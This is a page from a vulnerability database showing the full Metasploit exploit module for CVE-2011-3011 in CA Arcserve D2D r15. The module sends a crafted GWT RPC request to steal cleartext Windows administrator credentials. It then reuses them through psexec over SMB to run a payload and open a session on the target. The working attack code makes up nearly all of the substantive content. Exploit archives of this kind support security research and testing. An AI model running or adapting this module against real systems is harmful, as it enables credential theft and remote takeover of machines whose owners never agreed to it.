Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

CA Arcserve D2D - GWT RPC Credential Information Disclosure (Metasploit)

🗓️ 25 Jul 2011 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 38 Views

CA Arcserve D2D GWT RPC Credential Information Disclosur

Related
Code
ReporterTitlePublishedViews
Family
0day.today		CA Arcserve D2D - GWT RPC Credential Information Disclosure (Metasploit)
23 Mar 201700:00
zdt
ATTACKERKB		CVE-2011-3011
15 Aug 201119:55
attackerkb
Tenable Nessus		Computer Associates ARCserve D2D homepageServlet Servlet Information Disclosure
28 Jul 201100:00
nessus
Circl		CVE-2011-3011
25 Jul 201100:00
circl
Check Point Advisories		CA ARCserve D2D GWT RPC Request Credentials Disclosure (CVE-2011-3011)
27 Sep 201100:00
checkpoint_advisories
Check Point Advisories		CA ARCserve D2D GWT RPC Request Credentials Disclosure - Ver2 (CVE-2011-3011)
28 Dec 201400:00
checkpoint_advisories
CVE		CVE-2011-3011
15 Aug 201119:00
cve
Cvelist		CVE-2011-3011
15 Aug 201119:00
cvelist
Dsquare		CA ARCserve D2D r15 Credentials Disclosure
27 Apr 201200:00
dsquare
Metasploit		CA Arcserve D2D GWT RPC Credential Information Disclosure
1 Aug 201121:20
metasploit
Rows per page
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CA Arcserve D2D GWT RPC Credential Information Disclosure',
      'Description'    => %q{
          This module exploits an information disclosure vulnerability in the CA Arcserve
        D2D r15 web server. The information disclosure can be triggered by sending a
        specially crafted RPC request to the homepage servlet. This causes CA Arcserve to
        disclosure the username and password in cleartext used for authentication. This
        username and password pair are Windows credentials with Administrator access.
      },
      'Author'         =>
        [
          'bannedit', # metasploit module
          'rgod', # original public exploit
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2011-3011' ],
          [ 'OSVDB', '74162' ],
          [ 'EDB', '17574' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => "\x00\x0d\x0a"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'DisclosureDate' => 'Jul 25 2011',
      'DefaultTarget' => 0))


    register_options(
      [
        Opt::RPORT(8014),
      ], self.class )
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      module_fullname: fullname,
      post_reference_name: self.refname,
      private_data: opts[:password],
      origin_type: :service,
      private_type: :password,
      username: opts[:user]
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: opts[:status],
      last_attempted_at: DateTime.now
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def exploit
    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")

    data  = "5|0|4|"
    data << "http://#{datastore['RHOST']}:#{datastore['RPORT']}"
    data << "/contents/"
    data << "|2C6B33BED38F825C48AE73C093241510|"
    data << "com.ca.arcflash.ui.client.homepage.HomepageService"
    data << "|getLocalHost|1|2|3|4|0|"

    cookie = "donotshowgettingstarted=%7B%22state%22%3Atrue%7D"

    res = send_request_raw({
      'uri'     => '/contents/service/homepage',
      'version' => '1.1',
      'method'  => 'POST',
      'cookie'  => cookie,
      'data'    => data,
      'headers' =>
      {
        'Content-Type'  => "text/x-gwt-rpc; charset=utf-8",
        'Content-Length' => data.length
      }
    }, 5)

    if not res
      fail_with(Failure::NotFound, 'The server did not respond to our request')
    end

    resp = res.to_s.split(',')

    user_index = resp.index("\"user\"")
    pass_index = resp.index("\"password\"")

    if user_index.nil? and pass_index.nil?
      # Not a vulnerable server (blank user/pass doesn't help us)
      fail_with(Failure::NotFound, 'The server did not return credentials')
    end

    user = resp[user_index+1].gsub(/\"/, "")
    pass = ""

    if pass_index
      pass = resp[pass_index+1].gsub(/\"/, "")
    end

    srvc = {
        :host   => datastore['RHOST'],
        :port   => datastore['RPORT'],
        :proto  => 'tcp',
        :name   => 'http',
        :info   => res.headers['Server'] || ""
      }
    report_service(srvc)
    if user.nil? or pass.nil?
      print_error("Failed to collect the username and password")
      return
    end

    print_good("Collected credentials User: '#{user}' Password: '#{pass}'")

    # try psexec on the remote host
    psexec = framework.exploits.create("windows/smb/psexec")
    psexec.register_parent(self)

    psexec.datastore['PAYLOAD'] = self.datastore['PAYLOAD']

    if self.datastore['LHOST'] and self.datastore['LPORT']
      psexec.datastore['LHOST'] = self.datastore['LHOST']
      psexec.datastore['LPORT'] = self.datastore['LPORT']
    end

    psexec.datastore['RHOST'] = self.datastore['RHOST']

    psexec.datastore['DisablePayloadHandler'] = true
    psexec.datastore['SMBPass'] = pass
    psexec.datastore['SMBUser'] = user

    print_status("Attempting to login via windows/smb/psexec")

    # this is kind of nasty would be better to split psexec code out to a mixin (on the TODO List)
    begin
      psexec.exploit_simple(
        'LocalInput'  => self.user_input,
        'LocalOutput' => self.user_output,
        'Payload'  => psexec.datastore['PAYLOAD'],
        'RunAsJob' => true
      )
    rescue
      report_cred(
        ip: datastore['RHOST'],
        port: 445,
        service_name: 'smb',
        user: user,
        password: pass,
        status: Metasploit::Model::Login::Status::INCORRECT
      )

      print_status("Login attempt using windows/smb/psexec failed")
      print_status("Credentials have been stored and may be useful for authentication against other services.")
      # report the auth
      return
    end

    # report the auth
    report_cred(
      ip: datastore['RHOST'],
      port: 445,
      service_name: 'smb',
      user: user,
      password: pass,
      status: Metasploit::Model::Login::Status::SUCCESSFUL
    )

    handler
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Jul 2011 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 25
EPSS0.70335
metasploitca arcserve d2drpcinformation disclosureauthenticationwindowscveosvdbedb
38